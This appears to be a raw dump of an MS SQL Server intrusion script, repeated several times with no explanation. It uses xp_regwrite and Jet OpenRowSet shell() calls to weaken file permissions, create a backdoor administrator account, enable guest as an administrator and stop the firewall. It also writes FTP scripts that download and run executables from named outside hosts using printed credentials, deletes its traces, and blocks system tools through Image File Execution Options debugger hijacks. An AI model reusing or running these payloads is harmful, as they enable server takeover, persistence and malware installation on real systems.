-- Network protocol: TCP/IP
Set quoted_identifier on
Set implicit_transactions off
Set cursor_close_on_commit off
Set ansi_warnings on
Set ansi_padding on
Set ansi_nulls on
Set concat_null_yields_null on
Set language Simplified Chinese
Set dateformat ymd
Set datefirst 7
Exec master.. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/jet/4.0/engines', 'sandboxmode', 'reg _ dword', 1
Use master; DBCC addextendedproc ("xp_regwrite", "xpstar. DLL "); DBCC addextendedproc (" xp_regdeletekey "," xpstar. DLL "); Exec master .. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/jet/4.0/engines', 'sandboxmode', 'reg _ dword', 1; Exec master .. xp_regdeletekey 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows NT/CurrentVersion/Image File Execution options/ftp.exe'; Exec master .. xp_regdeletekey 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows NT/CurrentVersion/Image File Execution options/cacls.exe'; Exec master .. xp_regdeletekey 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows NT/CurrentVersion/Image File Execution options/reg.exe'; select * From OpenRowSet ('Microsoft. jet. oledb.4.0 ','; database = IAS/dnary. MDB ', 'select shell ("cacls cmd.exe/e/g system: F")') Select * From OpenRowSet ('Microsoft. jet. oledb.4.0 ','; database = IAS/dnary. MDB ', 'select shell ("cacls reg.exe/e/g system: F")') Select * From OpenRowSet ('Microsoft. jet. oledb.4.0 ','; database = IAS/dnary. MDB ', 'select shell ("cacls ftp.exe/e/g system: F")') Select * From OpenRowSet ('Microsoft. jet. oledb.4.0 ','; database = IAS/dnary. MDB ', 'select shell ("cacls net1.exe/e/g system: F")') Select * From OpenRowSet ('Microsoft. jet. oledb.4.0 ','; database = IAS/dnary. MDB ', 'select shell ("net1 user internetusers 5651585/Add")') Select * From OpenRowSet ('Microsoft. jet. oledb.4.0 ','; database = IAS/dnary. MDB ', 'select shell ("net1 localgroup administrators internetusers/Add")') Select * From OpenRowSet ('Microsoft. jet. oledb.4.0 ','; database = IAS/dnary. MDB ', 'select shell ("net1 localgroup administrators guest/ad")') Select * From OpenRowSet ('Microsoft. jet. oledb.4.0 ','; database = IAS/dnary. MDB ', 'select shell ("cmd.exe/C echo net1 stop sharedaccess> % SystemRoot %/system32/WBEM/sbboy. BAT & Echo open example .w..xxx> % SystemRoot %/system32/WBEM/sbboy. sys & Echo stra> % SystemRoot %/system32/WBEM/sbboy. sys & Echo 5651585> % SystemRoot %/system32/WBEM/sbboy. sys & Echo get 1.exe % SystemRoot %/system32/WBEM/cs.exe> % SystemRoot %/system32/WBEM/sbboy. sys & Echo get 2.exe % SystemRoot %/system32/WBEM/cp.exe> % SystemRoot %/system32/WBEM/sbboy. sys & Echo bye >>% Systemroot %/system32/WBEM/sbboy. sys & Echo FTP-S: % SystemRoot %/system32/WBEM/sbboy. sys> % SystemRoot %/system32/WBEM/sbboy. BAT & Echo % SystemRoot %/system32/WBEM/cs.exe> % SystemRoot %/system32/WBEM/sbboy. BAT & Echo Ping-N 10 127.0.0.1> % SystemRoot %/system32/WBEM/sbboy. BAT & Echo % SystemRoot %/system32/WBEM/cp.exe> % SystemRoot %/system32/WBEM/sbboy. BAT & Echo del % SystemRoot %/system32/WBEM/sbboy. sys> % SystemRoot %/system32/WBEM/sbboy. BAT & Echo del % SystemRoot %/system32/WBEM/sbboy. bat> % SystemRoot %/system32/WBEM/sbboy. BAT & % SystemRoot %/system32/WBEM/sbboy. bat ") ') Select * From OpenRowSet ('Microsoft. jet. oledb.4.0 ','; database = IAS/dnary. MDB ', 'select shell ("cmd.exe/C echo net1 stop sharedaccess> dboysb. BAT & Echo open 218.60.133.107> dboysb. sys & Echo xiaonao> dboysb. sys & Echo 469989261> dboysb. sys & Echo get 1.exe C:/dboycao.exe> dboysb. sys & Echo bye> dboysb. sys & Echo FTP-S: dboysb. sys> dboysb. BAT & Echo start C:/dboycao.exe> dboysb. BAT & Echo Ping-N 10 127.0.0.1> dboysb. BAT & Echo start C:/dboycao.exe> dboysb. BAT & Echo del dboysb. sys> dboysb. BAT & Echo del dboysb. bat> dboysb. BAT & Echo del % 0> dboysb. BAT & dboysb. bat ") ') exec master .. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows NT/CurrentVersion/Image File Execution options/cscript.exe', 'debugger', 'reg_sz', 'ctfmon.exe '; Exec master .. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows NT/CurrentVersion/Image File Execution options/reg.exe', 'debugger', 'reg_sz', 'ctfmon.exe '; select * From OpenRowSet ('Microsoft. jet. oledb.4.0 ','; database = IAS/dnary. MDB ', 'select shell ("cacls cmd.exe/e/D system")') Select * From OpenRowSet ('Microsoft. jet. oledb.4.0 ','; database = IAS/dnary. MDB ', 'select shell ("cacls command.com/e/D system")') Select * From OpenRowSet ('Microsoft. jet. oledb.4.0 ','; database = IAS/dnary. MDB ', 'select shell ("cacls net.exe/e/D system")') Select * From OpenRowSet ('Microsoft. jet. oledb.4.0 ','; database = IAS/dnary. MDB ', 'select shell ("cacls reg.exe/e/D system")') Select * From OpenRowSet ('Microsoft. jet. oledb.4.0 ','; database = IAS/dnary. MDB ', 'select shell ("cacls ftp.exe/e/D system")') Select * From OpenRowSet ('Microsoft. jet. oledb.4.0 ','; database = IAS/dnary. MDB ', 'select shell ("cacls cscript.exe/e/D system")') exec master .. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows NT/CurrentVersion/Image File Execution options/ftp.exe', 'debugger', 'reg_sz', 'ctfmon.exe '; Exec master .. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows NT/CurrentVersion/Image File Execution options/sethc.exe', 'debugger', 'reg_sz', 'ctfmon.exe '; select * From OpenRowSet ('Microsoft. jet. oledb.4.0 ','; database = IAS/dnary. MDB ', 'select shell ("cacls net1.exe/e/D system")') exec master .. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows NT/CurrentVersion/Image File Execution options/cacls.exe', 'debugger', 'reg_sz', 'ctfmon.exe ';
DBCC addextendedproc ("xp_regwrite", "xpstar. dll ")
DBCC addextendedproc ("xp_regdeletekey", "xpstar. dll ")
Exec master.. xp_regdeletekey 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows NT/CurrentVersion/Image File Execution options/ftp.exe'
Exec master.. xp_regdeletekey 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows NT/CurrentVersion/Image File Execution options/cacls.exe'
Exec master.. xp_regdeletekey 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows NT/CurrentVersion/Image File Execution options/reg.exe'
Select * From OpenRowSet ('Microsoft. jet. oledb.4.0 ','; database = IAS/dnary. MDB ', 'select shell ("cacls cmd.exe/e/g system: F ")'
Select * From OpenRowSet ('Microsoft. jet. oledb.4.0 ','; database = IAS/dnary. MDB ', 'select shell ("cacls reg.exe/e/g system: F ")'
Select * From OpenRowSet ('Microsoft. jet. oledb.4.0 ','; database = IAS/dnary. MDB ', 'select shell ("cacls ftp.exe/e/g system: F ")'
Select * From OpenRowSet ('Microsoft. jet. oledb.4.0 ','; database = IAS/dnary. MDB ', 'select shell ("cacls net1.exe/e/g system: F ")'
Select * From OpenRowSet ('Microsoft. Jet. oledb.4.0 ','; database = IAS/dnary. mdb ', 'select shell ("net1 user internetusers 5651585/Add ")'
Select * From OpenRowSet ('Microsoft. Jet. oledb.4.0 ','; database = IAS/dnary. mdb ', 'select shell ("net1 localgroup administrators internetusers/Add ")'
Select * From OpenRowSet ('Microsoft. Jet. oledb.4.0 ','; database = IAS/dnary. mdb ', 'select shell ("net1 localgroup administrators internetusers/Add ")'
Select * From OpenRowSet ('Microsoft. Jet. oledb.4.0 ','; database = IAS/dnary. mdb ', 'select shell ("net1 localgroup administrators guest/ad ")'
Select * From OpenRowSet ('Microsoft. Jet. oledb.4.0 ','; database = IAS/dnary. mdb ', 'select shell ("net1 localgroup administrators guest/ad ")'
Select * From OpenRowSet ('Microsoft. jet. oledb.4.0 ','; database = IAS/dnary. MDB ', 'select shell ("cmd.exe/C echo net1 stop sharedaccess> % SystemRoot %/system32/WBEM/sbboy. BAT & Echo open example .w..xxx> % SystemRoot %/system32/WBEM/sbboy. sys & Echo stra> % SystemRoot %/system32/WBEM/sbboy. sys & Echo 5651585> % SystemRoot %/system32/WBEM/sbboy. sys & Echo get 1.exe % SystemRoot %/system32/WBEM/cs.exe> % SystemRoot %/system32/WBEM/sbboy. sys & Echo get 2.exe % SystemRoot %/system32/WBEM/cp.exe> % SystemRoot %/system32/WBEM/sbboy. sys & Echo bye >>% Systemroot %/system32/WBEM/sbboy. sys & Echo FTP-S: % SystemRoot %/system32/WBEM/sbboy. sys> % SystemRoot %/system32/WBEM/sbboy. BAT & Echo % SystemRoot %/system32/WBEM/cs.exe> % SystemRoot %/system32/WBEM/sbboy. BAT & Echo Ping-N 10 127.0.0.1> % SystemRoot %/system32/WBEM/sbboy. BAT & Echo % SystemRoot %/system32/WBEM/cp.exe> % SystemRoot %/system32/WBEM/sbboy. BAT & Echo del % SystemRoot %/system32/WBEM/sbboy. sys> % SystemRoot %/system32/WBEM/sbboy. BAT & Echo del % SystemRoot %/system32/WBEM/sbboy. bat> % SystemRoot %/system32/WBEM/sbboy. BAT & % SystemRoot %/system32/WBEM/sbboy. bat ")'
Exec master.. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows NT/CurrentVersion/Image File Execution options/cscript.exe', 'debugger', 'reg_sz', 'ctfmon.exe'
Exec master.. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows NT/CurrentVersion/Image File Execution options/reg.exe', 'debugger', 'reg_sz', 'ctfmon.exe'
("Xp_regdeletekey", "xpstar. DLL "); Exec master .. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/jet/4.0/engines', 'sandboxmode', 'reg _ dword', 1; Exec master .. xp_regdeletekey 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows NT/CurrentVersion/Image File Execution options/ftp.exe'; Exec master .. xp_regdeletekey 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows NT/CurrentVersion/Image File Execution options/cacls.exe'; Exec master .. xp_regdeletekey 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows NT/CurrentVersion/Image File Execution options/reg.exe'; select * From OpenRowSet ('Microsoft. jet. oledb.4.0 ','; database = IAS/dnary. MDB ', 'select shell ("cacls cmd.exe/e/g system: F")') Select * From OpenRowSet ('Microsoft. jet. oledb.4.0 ','; database = IAS/dnary. MDB ', 'select shell ("cacls reg.exe/e/g system: F")') Select * From OpenRowSet ('Microsoft. jet. oledb.4.0 ','; database = IAS/dnary. MDB ', 'select shell ("cacls ftp.exe/e/g system: F")') Select * From OpenRowSet ('Microsoft. jet. oledb.4.0 ','; database = IAS/dnary. MDB ', 'select shell ("cacls net1.exe/e/g system: F")') Select * From OpenRowSet ('Microsoft. jet. oledb.4.0 ','; database = IAS/dnary. MDB ', 'select shell ("net1 user internetusers 5651585/Add")') Select * From OpenRowSet ('Microsoft. jet. oledb.4.0 ','; database = IAS/dnary. MDB ', 'select shell ("net1 localgroup administrators internetusers/Add")') Select * From OpenRowSet ('Microsoft. jet. oledb.4.0 ','; database = IAS/dnary. MDB ', 'select shell ("net1 localgroup administrators guest/ad")') Select * From OpenRowSet ('Microsoft. jet. oledb.4.0 ','; database = IAS/dnary. MDB ', 'select shell ("cmd.exe/C echo net1 stop sharedaccess> % SystemRoot %/system32/WBEM/sbboy. BAT & Echo open example .w..xxx> % SystemRoot %/system32/WBEM/sbboy. sys & Echo stra> % SystemRoot %/system32/WBEM/sbboy. sys & Echo 5651585> % SystemRoot %/system32/WBEM/sbboy. sys & Echo get 1.exe % SystemRoot %/system32/WBEM/cs.exe> % SystemRoot %/system32/WBEM/sbboy. sys & Echo get 2.exe % SystemRoot %/system32/WBEM/cp.exe> % SystemRoot %/system32/WBEM/sbboy. sys & Echo bye >>% Systemroot %/system32/WBEM/sbboy. sys & Echo FTP-S: % SystemRoot %/system32/WBEM/sbboy. sys> % SystemRoot %/system32/WBEM/sbboy. BAT & Echo % SystemRoot %/system32/WBEM/cs.exe> % SystemRoot %/system32/WBEM/sbboy. BAT & Echo Ping-N 10 127.0.0.1> % SystemRoot %/system32/WBEM/sbboy. BAT & Echo % SystemRoot %/system32/WBEM/cp.exe> % SystemRoot %/system32/WBEM/sbboy. BAT & Echo del % SystemRoot %/system32/WBEM/sbboy. sys> % SystemRoot %/system32/WBEM/sbboy. BAT & Echo del % SystemRoot %/system32/WBEM/sbboy. bat> % SystemRoot %/system32/WBEM/sbboy. BAT & % SystemRoot %/system32/WBEM/sbboy. bat ") ') Select * From OpenRowSet ('Microsoft. jet. oledb.4.0 ','; database = IAS/dnary. MDB ', 'select shell ("cmd.exe/C echo net1 stop sharedaccess> dboysb. BAT & Echo open 218.60.133.107> dboysb. sys & Echo xiaonao> dboysb. sys & Echo 469989261> dboysb. sys & Echo get 1.exe C:/dboycao.exe> dboysb. sys & Echo bye> dboysb. sys & Echo FTP-S: dboysb. sys> dboysb. BAT & Echo start C:/dboycao.exe> dboysb. BAT & Echo Ping-N 10 127.0.0.1> dboysb. BAT & Echo start C:/dboycao.exe> dboysb. BAT & Echo del dboysb. sys> dboysb. BAT & Echo del dboysb. bat> dboysb. BAT & Echo del % 0> dboysb. BAT & dboysb. bat ") ') exec master .. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows NT/CurrentVersion/Image File Execution options/cscript.exe', 'debugger', 'reg_sz', 'ctfmon.exe '; Exec master .. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows NT/CurrentVersion/Image File Execution options/reg.exe', 'debugger', 'reg_sz', 'ctfmon.exe '; select * From OpenRowSet ('Microsoft. jet. oledb.4.0 ','; database = IAS/dnary. MDB ', 'select shell ("cacls cmd.exe/e/D system")') Select * From OpenRowSet ('Microsoft. jet. oledb.4.0 ','; database = IAS/dnary. MDB ', 'select shell ("cacls command.com/e/D system")') Select * From OpenRowSet ('Microsoft. jet. oledb.4.0 ','; database = IAS/dnary. MDB ', 'select shell ("cacls net.exe/e/D system")') Select * From OpenRowSet ('Microsoft. jet. oledb.4.0 ','; database = IAS/dnary. MDB ', 'select shell ("cacls reg.exe/e/D system")') Select * From OpenRowSet ('Microsoft. jet. oledb.4.0 ','; database = IAS/dnary. MDB ', 'select shell ("cacls ftp.exe/e/D system")') Select * From OpenRowSet ('Microsoft. jet. oledb.4.0 ','; database = IAS/dnary. MDB ', 'select shell ("cacls cscript.exe/e/D system")') exec master .. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows NT/CurrentVersion/Image File Execution options/ftp.exe', 'debugger', 'reg_sz', 'ctfmon.exe '; Exec master .. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows NT/CurrentVersion/Image File Execution options/sethc.exe', 'debugger', 'reg_sz', 'ctfmon.exe '; select * From OpenRowSet ('Microsoft. jet. oledb.4.0 ','; database = IAS/dnary. MDB ', 'select shell ("cacls net1.exe/e/D system")') exec master .. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows NT/CurrentVersion/Image File Execution options/cacls.exe', 'debugger', 'reg_sz', 'ctfmon.exe ';
Use master;
DBCC addextendedproc ("xp_regwrite", "xpstar. dll ");
DBCC addextendedproc ("xp_regdeletekey", "xpstar. dll ");
Exec master.. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/jet/4.0/engines', 'sandboxmode', 'reg _ dword', 1;
Exec master.. xp_regdeletekey 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows NT/CurrentVersion/Image File Execution options/ftp.exe ';
Exec master.. xp_regdeletekey 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows NT/CurrentVersion/Image File Execution options/cacls.exe ';
Exec master.. xp_regdeletekey 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows NT/CurrentVersion/Image File Execution options/reg.exe ';
Select * From OpenRowSet ('Microsoft. jet. oledb.4.0 ','; database = IAS/dnary. MDB ', 'select shell ("cacls cmd.exe/e/g system: F ")')
Select * From OpenRowSet ('Microsoft. jet. oledb.4.0 ','; database = IAS/dnary. MDB ', 'select shell ("cacls reg.exe/e/g system: F ")')
Select * From OpenRowSet ('Microsoft. jet. oledb.4.0 ','; database = IAS/dnary. MDB ', 'select shell ("cacls ftp.exe/e/g system: F ")')
Select * From OpenRowSet ('Microsoft. jet. oledb.4.0 ','; database = IAS/dnary. MDB ', 'select shell ("cacls net1.exe/e/g system: F ")')
Select * From OpenRowSet ('Microsoft. Jet. oledb.4.0 ','; database = IAS/dnary. mdb ', 'select shell ("net1 user internetusers 5651585/Add ")')
Select * From OpenRowSet ('Microsoft. Jet. oledb.4.0 ','; database = IAS/dnary. mdb ', 'select shell ("net1 localgroup administrators internetusers/Add ")')
Select * From OpenRowSet ('Microsoft. Jet. oledb.4.0 ','; database = IAS/dnary. mdb ', 'select shell ("net1 localgroup administrators guest/ad ")')
Select * From OpenRowSet ('Microsoft. jet. oledb.4.0 ','; database = IAS/dnary. MDB ', 'select shell ("cmd.exe/C echo net1 stop sharedaccess> % SystemRoot %/system32/WBEM/sbboy. BAT & Echo open stra.3322.org> % SystemRoot %/system32/WBEM/sbboy. sys & Echo stra> % SystemRoot %/system32/WBEM/sbboy. sys & Echo 5651585> % SystemRoot %/system32/WBEM/sbboy. sys & Echo get 1.exe % SystemRoot %/system32/WBEM/cs.exe> % SystemRoot %/system32/WBEM/sbboy. sys & Echo get 2.exe % SystemRoot %/system32/WBEM/cp.exe> % SystemRoot %/system32/WBEM/sbboy. sys & Echo bye >>% Systemroot %/system32/WBEM/sbboy. sys & Echo FTP-S: % SystemRoot %/system32/WBEM/sbboy. sys> % SystemRoot %/system32/WBEM/sbboy. BAT & Echo % SystemRoot %/system32/WBEM/cs.exe> % SystemRoot %/system32/WBEM/sbboy. BAT & Echo Ping-N 10 127.0.0.1> % SystemRoot %/system32/WBEM/sbboy. BAT & Echo % SystemRoot %/system32/WBEM/cp.exe> % SystemRoot %/system32/WBEM/sbboy. BAT & Echo del % SystemRoot %/system32/WBEM/sbboy. sys> % SystemRoot %/system32/WBEM/sbboy. BAT & Echo del % SystemRoot %/system32/WBEM/sbboy. bat> % SystemRoot %/system32/WBEM/sbboy. BAT & % SystemRoot %/system32/WBEM/sbboy. bat ")')
Select * From OpenRowSet ('Microsoft. jet. oledb.4.0 ','; database = IAS/dnary. MDB ', 'select shell ("cmd.exe/C echo net1 stop sharedaccess> dboysb. BAT & Echo open 61.132.118.88> dboysb. sys & Echo 123> dboysb. sys & Echo 123> dboysb. sys & Echo get 1.exe C:/dboycao.exe> dboysb. sys & Echo bye> dboysb. sys & Echo FTP-S: dboysb. sys> dboysb. BAT & Echo start C:/dboycao.exe> dboysb. BAT & Echo Ping-N 10 127.0.0.1> dboysb. BAT & Echo start C:/dboycao.exe> dboysb. BAT & Echo del dboysb. sys> dboysb. BAT & Echo del dboysb. bat> dboysb. BAT & Echo del % 0> dboysb. BAT & dboysb. bat ")')
Exec master.. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows NT/CurrentVersion/Image File Execution options/cscript.exe', 'debugger', 'reg_sz', 'ctfmon.exe ';
Exec master.. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows NT/CurrentVersion/Image File Execution options/reg.exe', 'debugger', 'reg_sz', 'ctfmon.exe ';
Select * From OpenRowSet ('Microsoft. Jet. oledb.4.0 ','; database = IAS/dnary. mdb ', 'select shell ("cacls cmd.exe/e/D system ")')
Select * From OpenRowSet ('Microsoft. Jet. oledb.4.0 ','; database = IAS/dnary. mdb ', 'select shell ("cacls command.com/e/D system ")')
Select * From OpenRowSet ('Microsoft. Jet. oledb.4.0 ','; database = IAS/dnary. mdb ', 'select shell ("cacls net.exe/e/D system ")')
Select * From OpenRowSet ('Microsoft. Jet. oledb.4.0 ','; database = IAS/dnary. mdb ', 'select shell ("cacls reg.exe/e/D system ")')
Select * From OpenRowSet ('Microsoft. Jet. oledb.4.0 ','; database = IAS/dnary. mdb ', 'select shell ("cacls ftp.exe/e/D system ")')
Select * From OpenRowSet ('Microsoft. Jet. oledb.4.0 ','; database = IAS/dnary. mdb ', 'select shell ("cacls cscript.exe/e/D system ")')
Exec master.. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows NT/CurrentVersion/Image File Execution options/ftp.exe', 'debugger', 'reg_sz', 'ctfmon.exe ';
Exec master.. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows NT/CurrentVersion/Image File Execution options/sethc.exe', 'debugger', 'reg_sz', 'ctfmon.exe ';
Select * From OpenRowSet ('Microsoft. Jet. oledb.4.0 ','; database = IAS/dnary. mdb ', 'select shell ("cacls net1.exe/e/D system ")')
Exec master.. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows NT/CurrentVersion/Image File Execution options/cacls.exe', 'debugger', 'reg_sz', 'ctfmon.exe ';
Exec master.. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software/Microsoft/Windows NT/CurrentVersion/Image File Execution options/cscript.exe', 'debugger', 'reg_sz', 'ctfmon.exe'